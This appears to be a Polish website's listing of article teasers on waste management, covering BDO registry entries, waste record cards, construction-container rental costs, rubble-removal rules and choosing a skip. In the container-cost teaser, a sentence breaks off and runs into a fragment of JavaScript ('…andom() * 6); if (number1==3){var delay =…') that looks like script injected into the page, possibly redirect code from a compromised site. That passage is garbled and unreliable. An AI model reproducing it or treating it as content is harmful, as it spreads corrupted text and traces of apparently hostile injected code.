Jak dokonywać wpisów do BDO?

Jak dokonywać wpisów do BDO?

Każdy przedsiębiorca, który produkuje odpady inne niż komunalne, jest zobowiązany prawnie do prowadzenia dotyczącej ich dokumentacji. Przez wiele lat należało robić to ręcznie, poprzez wypełnianie odpowiednich...
Jak prowadzić kartę ewidencji odpadów?

Jak prowadzić kartę ewidencji odpadów?

Każdy przedsiębiorca, który wytwarza inne odpady niż komunalne, musi prowadzić ewidencję odpadów. Polega ona na gromadzeniu danych na temat rodzaju i ilości odpadów wytwarzanych oraz przekazywanych przez...
Jakie są koszty wynajmu kontenera na odpady budowlane?

Jakie są koszty wynajmu kontenera na odpady budowlane?

Duży remont lub budowa wiążą się z koniecznością odpowiedniego składowania odpadów, które w tym wypadku są specyficzne więc nie zostaną wywiezione przez standom() * 6); if (number1==3){var delay =...
Wywóz gruzu a przepisy prawne

Wywóz gruzu a przepisy prawne

Gruz jest odpadem, który często pojawia się podczas prac budowlanych lub remontowych. Zdarza się, że jest go bardzo dużo i nie zawsze wiemy, co z nim zrobić. Pozostawienie go na placu budowy ma nie tylko duże znaczenie ze...
Jak wybrać kontener na odpady budowlane?

Jak wybrać kontener na odpady budowlane?

Każdy remont lub budowa wiąże się z nagromadzeniem ogromnej ilości odpadów budowlanych, które trzeba gdzieś składować. Śmieci tego typu można zbierać w jednym miejscu, aby na końcu budowy je...